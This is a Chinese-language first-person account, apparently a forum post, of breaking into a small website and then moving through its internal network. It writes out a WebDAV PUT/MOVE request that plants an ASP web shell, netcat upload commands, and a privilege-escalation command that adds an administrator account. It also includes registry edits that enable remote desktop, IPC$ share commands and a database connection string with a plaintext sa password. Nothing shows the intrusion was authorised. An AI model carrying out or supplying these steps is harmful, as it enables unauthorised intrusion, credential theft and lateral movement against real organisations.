爱华网看站
旁注查询下,发现只有一个站,用的两个域名,跳转到同一个网站目录
既然不是大站,咱们就一通乱扫吧,应该不会有IDS啊什么的等着我们,嘿嘿
用wwwscan先扫了下目录文件啊什么的
猜目录的同时祭出咱们的WVS神器,配好数据,开骚
WVS不愧是神器,几分钟就扫出了几个严重的漏洞,看来这个站真的不安全
严重漏洞包括注入和WebDAV设置不当
注入看了下
Access的数据库没有猜出密码字段
与此同时wwwscan的扫描结果出来了
后台
Ewebeditor编辑器以及编辑器后台
两个后台都先试了下弱口令都没有弱口令查看Ewebeditor编辑器版本知道版本才好杀嘛
版本5.5百度了下网上的通杀EXP都不好使估计漏洞都补上了
看网站后台咱们不是还有个注入吗既然猜不到字段会不会后台的POST值就是字段值呢一般的程序员都喜欢偷这个懒
查看后台源码
好刚刚不是猜出了帐号字段吗和我们的猜想吻合了一半那密码字段可能就是user_psw了加到注入工具中跑密码MD5
果然密码的MD5值跑出来了
拿到cmd5上去破解
拿密码进后台
在后台转了很久能上传的地方都做了文件类型禁止思路一下就断了
上个厕所看会儿电影回来再想忽然想起WVS不是扫出了个WebDAV权限设置不当漏洞吗
果断写了个txt内容
PUT/zerosoul.txtHTTP/1.1
HOST:www.xxxx.com
Content-Length:23
<%evalrequest("cmd")%>
我解释下啊WebDAV权限设置不当一般就是IIS写权限漏洞啊什么的具体的可以百度
这里用的是PUT动作直接PUT一个TXT上去
然后用nc传上去
nc.exewww.xxxx.com80<1.txt
访问下/zerosoul.txt存在
然后把那个txt用MOVE动作MOVE成asp后缀
MOVE/zerosoul.txtHTTP/1.1
HOST:www.xxxxz.com
Destination:http://www.xxxxx.com/asp.asp
nc.exe网址80<1.txt
然后访问asp.asp存在
菜刀连接之
密码cmd
上大马看了下WS组件在那我们就直接上传cmd先把把自己的2003系统的cmd.exe重命名成cmd.com传上去了
虚拟终端下执行命令
我擦碉堡了居然有内网懂的同学知道看到这种IP的就知道是内网环境
Systeminfo下发现对方服务器没有打上PR的补丁没办法pr提权
C:recyclerpr.exe"netuseradmin$123456/add&netlocalgroupadministratorsadmin$/add"
执行这个命令后就加了一个用户了
Netstat-na没开3389端口
那就读注册表看看开了RDP服务没
REGQUERY"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer"
发现fDenyTSConnections值为0那就是开了
端口号改掉了
读取注册表
REGQUERY"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp"
远程桌面的端口号改成3390了
远程终端连接之
然后就是读取管理员hash拿hash去破解
删除admin$帐号再用管理员的帐号administrator去登录
上去了就是就是咱们的内网之旅咯
上传cainhscanX-Scan一个是内网ARP嗅探工具另外两个个是内网扫描工具
然后一顿扫
(哈哈小站就不用顾虑那么多啦)
得到一下信息
网络拓扑结构大概是
.1是外网出口
.2是网关
其他的是内网成员
.40之后的就是其他的内网段了
先搞同网段的这几台电脑吧
Ipconfig/all啊
Netview/domain啊没有域啊啊啊啊啊啊啊啊
Hscan骚啊骚啊骚啊骚
几个sa几个FTP一个mysql
上传1433综合利用工具mysql.exe啊啊啊啊
用读出的本机hash远程同内网的server3啊(4和56没有开远程还是貌似改掉了端口号)发现能连
靠失败的WebDAV啊他居然还用
里面貌似还有很多内网段
.26开了1433
3389没开咱们替他开咯
regdelete"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer"/vfDenyTSConnections/f
regadd"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer"/vfDenyTSConnections/tREG_DWORD/d0/f
添加帐号密码远程登录
上去关360读hash其实如果为了便于管理可以给他们种马但是友情检测那就算了
ftp过去
拿下.26
.24没有开338980服务也是只有默认页面其他的服务都没有开
那么可以直接IPC上去
netuse\10.10.1.24ipc$"密码"/user:"用户名"
netuseh:\10.10.1.24c$
在24的默认网站路径上面写个asp大马然后传个cmdpr开3389
成功拿下
IPC$.25
在他的默认网站路径里面找网站
找啊找啊找
找到一个网站的配置文件
打开
看啊看
pplication("ConnString")="Provider=SQLOLEDB.1;PersistSecurityInfo=False;UserID=sa;Password=dsideal;InitialCatalog=fsms;DataSource=10.10.1.25"
发现sa
连上去
3389之
对了咱们不是还看到一个SERVER1吗
那我们就去找找那个SERVER1
IPC
先不看SERVER1了
然后就是.10了
80访问上去真吓人,还尼玛审计行为呢
试了几个密码他都说验证码错误我也不清楚怎么搞的
本内网的几台服务器本拿下了
可惜的是没配好马啊
现在就是要看看其他内网段了
.1.2是H3C交换机任何外网IP与.22连接都显示10.10.1.1那么.1.1就是连接Internet的路由器了
80端口访问.1.2用交换机的弱口令进去了
路由信息
所有电脑的MAC
所有的与.1.2连接的网段
现在可以大概的画出这个内网的网络拓扑结构
我就用画图工具随便画个出来大家别笑哈
用HSCAN和X-scan扫了下10.10.11.1/24貌似是个PC个人电脑网段猜想是办公室还是机房什么的吧
含有大量的windows电脑
并且扫了下其他的网段
发现10.10.12.1/2410.10.13.1/2410.10.14.1/2410.10.15.1/2410.10.16.1/24都是空的
而在10.10.17.1/24网段发现大量的linux主机存活并且开有80端口
IP前73的均为Linux而73之后的却为windows
10.10.17.248为无线路由器
10.10.18.1/24存活少量windowsIPC都能连上但是蛋疼地没开共享没办法
10.10.19.1/24
10.10.20.1/24
10.10.24.1/24
10.10.25.1/24
10.10.26.1/24
都有电脑存活但是都尼玛是PC
拿下的几台服务器种了马但上线几分钟后又掉了估计那个行为审计服务器有防火墙功能
百度了下那套审计系统给跪了国家级的防御系统~~~~要不少钱吧
